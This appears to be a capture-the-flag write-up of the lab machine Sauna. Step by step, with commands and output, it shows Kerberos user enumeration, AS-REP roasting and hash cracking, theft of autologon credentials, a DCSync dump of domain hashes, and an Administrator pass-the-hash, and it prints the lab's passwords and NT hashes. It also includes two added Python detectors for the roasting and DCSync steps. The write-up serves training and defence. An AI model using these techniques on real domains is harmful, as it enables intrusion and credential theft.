Enumeration
We start by scanning the machine's ports with nmap. We find several open ports, among them 80, which runs an HTTP service.
❯ nmap 10.10.10.175
Nmap scan report for 10.10.10.175
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49677/tcp open unknown
49699/tcp open unknown
With crackmapexec, besides the machine name we also obtain its domain.
❯ crackmapexec smb 10.10.10.175
SMB 10.10.10.175 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
For possible later attacks, or simply for convenience, we add it to /etc/hosts.
❯ echo "10.10.10.175 egotistical-bank.local" | sudo tee -a /etc/hosts
We can use kerbrute with a username wordlist to enumerate possible valid users by brute force against Kerberos; we find several.
❯ kerbrute userenum -d egotistical-bank.local --dc egotistical-bank.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 05/03/23 - Ronnie Flathers @ropnop
> Using KDC(s):
> egotistical-bank.local:88
> [+] VALID USERNAME: administrator@egotistical-bank.local
> [+] VALID USERNAME: hsmith@egotistical-bank.local
> [+] VALID USERNAME: sauna@egotistical-bank.local
> [+] VALID USERNAME: fsmith@egotistical-bank.local
Shell - fsmith
With this list of users we can try an ASREPRoast attack to see whether any of them is vulnerable. fsmith is, and the tool returns his hash.
❯ impacket-GetNPUsers egotistical-bank.local/ -no-pass -usersfile users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:3f439edff10b3b3e3d104edd8735a4ea$...
[-] User sauna doesn't have UF_DONT_REQUIRE_PREAUTH set
We can crack it with john and obtain fsmith's password in plaintext.
❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 XOP 4x2])
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
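From the defender's side, the AS-REP roasting step above leaves two traces: the roastable account itself (the userAccountControl flag GetNPUsers tests for) and the TGT request the DC logs. The following Python script is an added example, not part of the original writeup; the directory snapshot, event records and the 10.10.14.5 source address are constructed for it.

```python
"""Added example (not from the original writeup): two defender-side checks for
the AS-REP roasting step shown above.

1. Accounts whose userAccountControl has DONT_REQUIRE_PREAUTH (0x400000) set
   can be roasted; that is the flag GetNPUsers reports on.
2. Security event 4768 (TGT requested) with Pre-Authentication Type 0 is the
   DC-side footprint of that request; Ticket Encryption Type 0x17 (RC4) matches
   the $krb5asrep$23$ prefix above (etype 23) and is the classic roasting sign.

The directory snapshot and events below are constructed for this example.
"""
DONT_REQUIRE_PREAUTH = 0x400000
NORMAL_ACCOUNT = 0x200
RC4_HMAC = 0x17

def roastable_accounts(uac_by_user):
    """Users with Kerberos pre-authentication disabled, sorted."""
    return sorted(u for u, uac in uac_by_user.items() if uac & DONT_REQUIRE_PREAUTH)

def asrep_roast_events(events):
    """(user, source IP, etype) for 4768 events issued without pre-authentication.
    Field names follow the 4768 event XML; values are constructed."""
    hits = []
    for e in events:
        if e["EventID"] != 4768:
            continue  # only TGT requests carry the pre-auth type
        if e["PreAuthType"] == 0:
            hits.append((e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"]))
    return hits

SAMPLE_UAC = {  # constructed snapshot of the domain's accounts
    "administrator": NORMAL_ACCOUNT,
    "hsmith": NORMAL_ACCOUNT,
    "fsmith": NORMAL_ACCOUNT | DONT_REQUIRE_PREAUTH,
    "svc_loanmgr": NORMAL_ACCOUNT,
}

SAMPLE_EVENTS = [  # constructed; 10.10.14.5 stands in for the requesting host
    {"EventID": 4768, "TargetUserName": "fsmith", "PreAuthType": 0,
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.14.5"},
    {"EventID": 4768, "TargetUserName": "hsmith", "PreAuthType": 2,  # normal logon
     "TicketEncryptionType": 0x12, "IpAddress": "10.10.10.20"},
    {"EventID": 4769, "TargetUserName": "fsmith", "PreAuthType": 0,  # TGS, ignored
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.14.5"},
]

if __name__ == "__main__":
    print("roastable:", roastable_accounts(SAMPLE_UAC))
    print("4768 without pre-auth:", asrep_roast_events(SAMPLE_EVENTS))
```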
Checking them with crackmapexec we can see that they are valid for SMB; not only that, they are also valid for WinRM, so we can connect.
❯ crackmapexec smb egotistical-bank.local -u fsmith -p Thestrokes23
SMB egotistical-bank.local 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB egotistical-bank.local 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23
❯ crackmapexec winrm egotistical-bank.local -u fsmith -p Thestrokes23
SMB egotistical-bank.local 5985 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP egotistical-bank.local 5985 SAUNA [*] http://egotistical-bank.local:5985/wsman
WINRM egotistical-bank.local 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)
We connect using evil-winrm and can read the first flag.
❯ evil-winrm -i egotistical-bank.local -u fsmith -p Thestrokes23
PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
PS C:\Users\FSmith\Documents> type ..\Desktop\user.txt
608**************************d4e
PS C:\Users\FSmith\Documents>
Shell - svc_loanmgr
To look for possible ways to escalate, we upload and import the PowerUp module.
PS C:\Users\FSmith\Documents> upload PowerUp.ps1
Info: Uploading PowerUp.ps1 to C:\Users\FSmith\Documents\PowerUp.ps1
Data: 660436 bytes of 660436 bytes copied
Info: Upload successful!
PS C:\Users\FSmith\Documents> Import-Module .\PowerUp.ps1
PS C:\Users\FSmith\Documents>
When we invoke the module it starts testing several possible escalation paths; among the information it reports we find credentials in the Autologon section.
PS C:\Users\FSmith\Documents> Invoke-AllChecks
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
[*] Checking service permissions...
[*] Checking %PATH% for potentially hijackable .dll locations...
HijackablePath : C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps\
AbuseFunction : Write-HijackDll -OutputFile 'C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps\\wlbsctrl.dll' -Command '...'
[*] Checking for AlwaysInstallElevated registry key...
[*] Checking for Autologon credentials in registry...
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
[*] Checking for vulnerable registry autoruns and configs...
[*] Checking for vulnerable schtask files/configs...
[*] Checking for unattended install files...
[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...
PS C:\Users\FSmith\Documents>
We can also see this with the reg command by querying the winlogon key.
PS C:\Users\FSmith\Documents> reg query 'HKLM\software\microsoft\windows nt\currentversion\winlogon' | Select-String DefaultDomainName,DefaultUserName,DefaultPassword
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DefaultPassword REG_SZ Moneymakestheworldgoround!
PS C:\Users\FSmith\Documents>
However, when we test them with crackmapexec, they are not valid for SMB.
❯ crackmapexec smb egotistical-bank.local -u svc_loanmanager -p Moneymakestheworldgoround!
SMB egotistical-bank.local 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB egotistical-bank.local 445 SAUNA [-] EGOTISTICAL-BANK.LOCAL\svc_loanmanager:Moneymakestheworldgoround! STATUS_LOGON_FAILURE
This is because the user svc_loanmanager does not exist either locally or in the domain; the user that could be valid is svc_loanmgr, which is quite similar to the original.
PS C:\Users\FSmith\Documents> net user /domain
User accounts for \\
-------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
PS C:\Users\FSmith\Documents>
We check with crackmapexec using that user and the credentials are valid for both SMB and WinRM, so we can simply connect with evil-winrm and get a shell.
❯ crackmapexec smb egotistical-bank.local -u svc_loanmgr -p Moneymakestheworldgoround!
SMB egotistical-bank.local 445 SAUNA [*] Windows 10.0 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB egotistical-bank.local 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!
❯ crackmapexec winrm egotistical-bank.local -u svc_loanmgr -p Moneymakestheworldgoround!
SMB egotistical-bank.local 5985 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP egotistical-bank.local 5985 SAUNA [*] http://egotistical-bank.local:5985/wsman
WINRM egotistical-bank.local 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)
❯ evil-winrm -i egotistical-bank.local -u svc_loanmgr -p Moneymakestheworldgoround!
PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr
PS C:\Users\svc_loanmgr\Documents>
Shell - Administrator
To enumerate the domain's information and privileges we upload the SharpHound.ps1 module with the upload function and import it in PowerShell.
PS C:\Users\svc_loanmgr\Documents> upload SharpHound.ps1
Info: Uploading SharpHound.ps1 to C:\Users\svc_loanmgr\Documents\SharpHound.ps1
Data: 1757460 bytes of 1757460 bytes copied
Info: Upload successful!
PS C:\Users\svc_loanmgr\Documents> Import-Module .\SharpHound.ps1
PS C:\Users\svc_loanmgr\Documents>
We invoke the module telling it to collect all the domain information; this creates a zip containing it, which we can download using download.
PS C:\Users\svc_loanmgr\Documents> Invoke-BloodHound -CollectionMethod All
PS C:\Users\svc_loanmgr\Documents> dir
Directory: C:\Users\svc_loanmgr\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/4/2023 2:46 AM 11545 20230504024616_BloodHound.zip
-a---- 5/4/2023 2:43 AM 1318097 SharpHound.ps1
PS C:\Users\svc_loanmgr\Documents> download 20230504024616_BloodHound.zip BH.zip
Info: Downloading C:\Users\svc_loanmgr\Documents\20230504024616_BloodHound.zip to BH.zip
Info: Download successful!
PS C:\Users\svc_loanmgr\Documents>
We upload the zip to BloodHound and, listing the users who can perform a DCSync, we find the user svc_loanmgr, whose credentials we already have.
There are several ways to do it, but we can simply use crackmapexec as svc_loanmgr to dump ntds.dit via the drsuapi method.
❯ crackmapexec smb 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround! --ntds drsuapi
SMB 10.10.10.175 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!
SMB 10.10.10.175 445 SAUNA [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.10.10.175 445 SAUNA [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.175 445 SAUNA Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
SMB 10.10.10.175 445 SAUNA Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.175 445 SAUNA krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
SMB 10.10.10.175 445 SAUNA EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
SMB 10.10.10.175 445 SAUNA EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
SMB 10.10.10.175 445 SAUNA EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SMB 10.10.10.175 445 SAUNA SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:020b966fa703e1eee69c12de71a6874b:::
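The DCSync above is a directory replication request, which a domain controller audits as Security event 4662 when directory service access auditing is enabled; the replication extended-right GUIDs in the Properties field identify it, and the DC's own account (SAUNA$ here) is the only principal that should be using them. The Python detector below is an added example, not part of the original writeup; the event records and the allow-list are constructed for it, and the Domain-DNS class GUID and the two replication right GUIDs are the standard Active Directory values.

```python
"""Added example (not from the original writeup): spotting the DCSync step shown
above from Security event 4662 on the domain controller.

A DRSUAPI replication request is audited (with "Audit Directory Service Access"
enabled and a SACL on the domain object) as 4662 with Access Mask 0x100
(control access) and replication extended-right GUIDs in the Properties field:
  1131f6aa-9c07-11d1-f79f-00c04fc2dcd2  DS-Replication-Get-Changes
  1131f6ad-9c07-11d1-f79f-00c04fc2dcd2  DS-Replication-Get-Changes-All
Domain controllers replicate legitimately, so their accounts are allow-listed;
any other principal exercising these rights is reported. Events are constructed.
"""
import re

REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
CONTROL_ACCESS = 0x100
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")

def dcsync_alerts(events, allowed_accounts):
    """Return (user, [rights]) for 4662 events in which a principal outside
    allowed_accounts (lower-case names, normally the DC computer accounts)
    exercised a replication right. Properties is the raw multi-line field."""
    alerts = []
    for e in events:
        if e["EventID"] != 4662 or not (e["AccessMask"] & CONTROL_ACCESS):
            continue
        user = e["SubjectUserName"]
        if user.lower() in allowed_accounts:
            continue
        guids = GUID_RE.findall(e["Properties"].lower())
        rights = sorted(REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS)
        if rights:
            alerts.append((user, rights))
    return alerts

DOMAIN_DNS = "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"  # Domain-DNS object class
SAMPLE_EVENTS = [  # constructed; mirrors the dump performed as svc_loanmgr above
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "AccessMask": 0x100,
     "Properties": DOMAIN_DNS + "\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "AccessMask": 0x100,  # the DC
     "Properties": DOMAIN_DNS + "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "fsmith", "AccessMask": 0x100,  # other right
     "Properties": DOMAIN_DNS + "\n\t{00000000-0000-0000-0000-000000000000}"},
]

if __name__ == "__main__":
    for user, rights in dcsync_alerts(SAMPLE_EVENTS, {"sauna$"}):
        print(f"possible DCSync by {user}: {', '.join(rights)}")
```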
Finally, we can take the Administrator user's hash from the listing and connect with evil-winrm via pass-the-hash to read the flag.
❯ evil-winrm -i egotistical-bank.local -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
265**************************fa3
PS C:\Users\Administrator\Documents>